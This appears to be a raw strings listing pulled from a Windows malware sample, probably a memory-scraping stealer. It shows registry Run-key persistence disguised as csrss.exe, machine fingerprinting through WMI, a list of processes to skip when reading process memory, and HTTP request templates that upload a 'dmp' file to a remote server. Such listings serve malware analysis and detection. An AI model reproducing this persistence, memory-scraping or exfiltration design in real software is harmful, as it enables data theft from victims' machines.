0x40143cL %u.%u.%u
|
|
0x401474L c:\
|
|
0x4014abL -%X.
|
|
0x4014feL .
|
|
0x40154bL SOFTWARE\Microsoft\Windows\CurrentVersion
|
|
0x40155bL ProductId
|
|
0x4015b8L SOFTWARE\Microsoft\Windows NT\CurrentVersion
|
|
0x4015c8L ProductId
|
|
0x401678L _%X%X
|
|
0x401870L wsock32.dll
|
|
0x40188bL wsock32.dll
|
|
0x4018a2L __WSAFDIsSet
|
|
0x4018b7L WSAStartup
|
|
0x4018ccL send
|
|
0x4018e1L socket
|
|
0x4018f6L gethostbyname
|
|
0x40190bL connect
|
|
0x401920L closesocket
|
|
0x401935L select
|
|
0x40194aL recv
|
|
0x401ae0L SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
|
0x401af7L csrss
|
|
0x401b48L %s "%s"
|
|
0x401cbcL .com
|
|
0x401ce9L .org
|
|
0x401d13L .net
|
|
0x401d39L .ru
|
|
0x401d53L .in
|
|
0x40208bL %X%X
|
|
0x402184L Name
|
|
0x402194L Description
|
|
0x402204L Model
|
|
0x402214L Size
|
|
0x402259L SKU
|
|
0x402269L Model
|
|
0x40229bL %s-%s-%s-%s
|
|
0x4022f0L \csrss.exe
|
|
0x402360L \csrss.exe
|
|
0x4023abL \csrss.exe
|
|
0x402a23L \dmsnf.cfg
|
|
0x402c2fL GET /index.php HTTP/1.1
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 10.0; DSNF_%u=%s=)
|
|
Connection: Keep-Alive
|
|
Host: %s
|
|
|
|
|
|
|
|
0x402cb9L <!-
|
|
0x402df7L +++++++++++++++++++++++++++7ac103214023
|
|
0x402e0eL --%s
|
|
Content-Disposition: form-data; name="userfile[]"; filename="dmp"
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
|
|
0x402e2cL POST /indexu.php HTTP/1.1
|
|
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
|
|
Accept-Language: en-US
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; DSNF_%u=%s=)
|
|
Content-Type: multipart/form-data; boundary=%s
|
|
Host: %s
|
|
Content-Length: %u
|
|
Connection: Keep-Alive
|
|
Cache-Control: no-cache
|
|
|
|
|
|
|
|
0x402f7bL
|
|
--%s--
|
|
|
|
|
|
0x403018L <!-OK->
|
|
0x40309cL LocalFree
|
|
0x4030b1L GetCurrentProcessId
|
|
0x4030c6L Module32First
|
|
0x4030dbL GetTickCount
|
|
0x4030f0L GetFileSize
|
|
0x403105L WriteFile
|
|
0x40311aL Process32First
|
|
0x40312fL LoadLibraryA
|
|
0x403144L DeleteFileA
|
|
0x403159L GetWindowsDirectoryA
|
|
0x40316eL OpenProcess
|
|
0x403183L ReadProcessMemory
|
|
0x403198L CreateProcessA
|
|
0x4031adL CreateFileA
|
|
0x4031c2L LocalAlloc
|
|
0x4031d7L Process32Next
|
|
0x4031ecL CloseHandle
|
|
0x403201L CopyFileA
|
|
0x403216L CreateToolhelp32Snapshot
|
|
0x40322bL GetModuleHandleA
|
|
0x403240L SetFilePointer
|
|
0x403255L ReadFile
|
|
0x40326aL VirtualQueryEx
|
|
0x403292L #KHALMNPR.EXE#LBTWiz.exe#ati2evxx.exe#atiesrxx.exe#atieclxx.exe#TrueSuiteService.exe#TrueService.exe#ibmpmsvc.exe#RtHDVCpl.exe#tpfnf6r.exe#LVOSDSVC.exe#TPOSDSVC.exe#TPONSCR.exe#TpScrex.exe#TPHKSVC.exe#tpnumlkd.exe#tpnumlk.exe#ctfmon.exe#msiexec.exe#wdfmgr.exe#wscntfy.exe#SynTPHelper.exe#SynTPEnh.exe#smss.exe#csrss.exe#winlogon.exe#spoolsv.exe#taskmgr.exe#wininit.exe#nvvsvc.exe#btwdins.exe#GoogleUpdate.exe#lsass.exe#LogonUI.exe#hkcmd.exe#wuauclt.exe#igfxpers.exe#igfxsrvc.exe#igfxext.exe#jusched.exe#patch.exe#rthdcpl.exe#mobsync.exe#MsMpEng.exe#msseces.exe#sidebar.exe#internat.exe#WmiPrvSE.exe#SLsvc.exe#kadxmain.exe#SkyTel.exe#realsched.exe#reader_sl.exe#nvxdsync.exe#nvsvc32.exe#ntrtscan.exe#ETDService.exe#HeciServer.exe#ETDCtrl.exe#ETDCtrlHelper.exe#
|
|
0x40330bL VMware
|
|
0x403332L audio
|
|
0x403359L Apple
|
|
0x403380L License
|
|
0x4033a7L FontCache
|
|
0x4033ceL Touch
|
|
0x4033f5L icon
|
|
0x40341cL torrent
|
|
0x403443L Phone
|
|
0x40346aL Tray
|
|
0x403491L Icon
|
|
0x4034b8L FlashPlayer
|
|
0x4034dfL movie
|
|
0x403506L vmware
|
|
0x40352dL tray
|
|
0x403554L video
|
|
0x40357bL Torrent
|
|
0x4035a2L sound
|
|
0x4035c9L Skype
|
|
0x403611L #
|
|
0x403683L 32\Dwm.exe
|
|
0x4036aaL 32\TpShocks.exe
|
|
0x4036d1L \pwrmgrv\
|
|
0x4036f8L \Audio
|
|
0x40371fL \Video
|
|
0x403746L \Movie
|
|
0x40376dL Audio\
|
|
0x403794L Video\
|
|
0x4037bbL Movie\
|
|
0x4037e2L \Apple
|
|
0x403809L \iPod\
|
|
0x403830L \DVD
|
|
0x403857L \QuickTime\
|
|
0x40387eL \Foxit Software\
|
|
0x4038a5L \K-Lite C
|
|
0x4038ccL Games\
|
|
0x4038f3L Player\
|
|
0x40391aL \Windows Defender\
|
|
0x403941L \DAEMON Tools
|
|
0x403968L \Synaptics\
|
|
0x40398fL \Roxio\
|
|
0x4039b6L \Adobe\
|
|
0x4039ddL \Lenovo\
|
|
0x403a00L \ThinkPad\
|
|
0x403bbeL
|
|
|
|
=====[
|
|
0x403be4L ]=(
|
|
0x403c0eL )=====
|
|
|
|
|
|
|
|
0x403d1dL advapi32.dll
|
|
0x403d38L advapi32.dll
|
|
0x403d4fL RegCloseKey
|
|
0x403d64L RegSetValueExA
|
|
0x403d79L LookupPrivilegeValueA
|
|
0x403d8eL RegCreateKeyExA
|
|
0x403da3L OpenProcessToken
|
|
0x403db8L AdjustTokenPrivileges
|
|
0x403dfcL kernel32.dll
|
|
0x403e11L GetProcAddress
|
|
0x403e2cL CreateThread
|
|
0x403e87L \dmp.tmp
|
|
0x403ea7L SeDebugPrivilege
|
|
0x401db7L ROOT\CIMV2
|
|
0x401e47L WQL
|
|
0x402174L SELECT * FROM Win32_Processor
|
|
0x4021c9L SELECT * FROM Win32_ComputerSystemProduct
|
|
0x4021f4L SELECT * FROM Win32_DiskDrive
|
|
0x402249L SELECT * FROM Win32_BaseBoard
|